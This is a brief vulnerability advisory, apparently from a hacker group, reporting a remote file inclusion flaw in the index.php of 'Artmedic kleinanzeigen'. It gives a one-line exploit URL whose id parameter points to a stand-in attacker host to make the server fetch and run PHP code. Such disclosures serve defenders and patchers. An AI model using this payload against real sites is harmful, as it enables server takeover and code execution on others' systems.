Artmedic kleinanzeigen allow code inclusion in index.php. Exploit: www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.com An evil attacker could be use this vulnerability to execute php code with the same user id of the running server. Thanks and sorry for the bad english Dominus_Vis from Infektion Group :> irc.phey.net -j #infektion